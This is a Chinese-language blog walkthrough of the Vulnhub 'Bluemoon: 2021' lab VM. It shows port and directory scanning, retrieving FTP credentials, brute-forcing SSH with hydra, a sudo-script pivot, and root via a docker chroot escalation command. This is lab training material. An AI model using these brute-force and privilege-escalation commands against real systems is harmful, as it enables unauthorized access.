看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021

简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:需要获得root权限找到flag


Difficulty:Easy (简单的)

Vulnhub靶机下载:

官网下载: https: //download.vulnhub.com/bluemoon/bluemoon.ova


Vulnhub靶机安装:

下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

渗透机:kali IP :172.20.10.5 靶机IP :172.20.10.9


使用命令:nmap -sS -sV -n -T4 -p- 172.20.10.9

开启了21,2280端口访问80使用工具:dirb,dirsearch,gobuster 扫到/hidden_text


进行访问,得到一个二维码 QR扫一下 得到账号密码:userftp/ftpp@ssword


gobuster dir -u http://172.20.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   -x php,bak,txt,html,sql,zip,phtml,sh

9f83dc131304442681744acaafdee9ed.png


2750676245234b4e898e4dd40cb4dd8d.png


5540de24bf6940f697734fab2a91aa4c.png


e3bdeb2140b14cfba6c78dae04087f9e.png



992b08a833fd4c838a2eec4c61b56cf0.png

②:FTP登入:

登入成功,后发现两个文件 get进行下载 一个是账号一个是密码文件 可以进行爆破!


7c43c8abc4244b04befa85e6e024216f.png


c94b23d5778441bd9f65e97959c68eec.png


③:暴力破解:

这里使用hydra 九头蛇进行爆破命令如下:

hydra -l robin -P p_lists.txt  ssh://172.20.10.9 

1955f28f6ad34767a13c8eef274034ef.png


④:SSH登入:

爆破得到SSH账号密码为:robin/k4rv3ndh4nh4ck3r尝试登入,登入成功!!



这里找到一个flag。


⑤:Sudo-docker提权:

老样子三件套whoami、id、uname -a 查看权限比较低 sudo -l 查看

发现jerry 用户的 /home/robin/project/feedback.sh文件 进行查看


sudo -u jerry /home/robin/project/feedback.sh 运行脚本得到shell 又找到个flag

python3 -c "import pty;pty.spawn('/bin/bash')"
• 1


c4357904c54e420ab60d8078fffad6d9.png


40259d6d314348e58fd40de6859859bc.png


GTFOBins:https://gtfobins.github.io/gtfobins/docker/



⑥:获取FLAG:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!



Vulnhub靶机渗透总结:

1.信息收集dirb,dirsearch,gobuster,nikto 工具得使用

2.Sudo-docker提权 docker run -v /:/mnt --rm -it alpine chroot /mnt sh命令的使用

3.FTP下载、hydra爆破、SSH登入 渗透的流程思路


🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
4月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
102 0
|
4月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
48 0
|
4月前
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
47 0
|
4月前
|
SQL 安全 Oracle
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
54 0
|
4月前
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机Vulnhub——Photographer: 1
看完这篇 教你玩转渗透测试靶机Vulnhub——Photographer: 1
45 0
|
4月前
|
安全 网络安全 数据安全/隐私保护
看完这篇 教你玩转渗透测试靶机Vulnhub——Toppo: 1
看完这篇 教你玩转渗透测试靶机Vulnhub——Toppo: 1
44 0
|
5月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
201 0
|
30天前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
23 0
|
30天前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
59 0
|
数据采集 存储 Linux
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南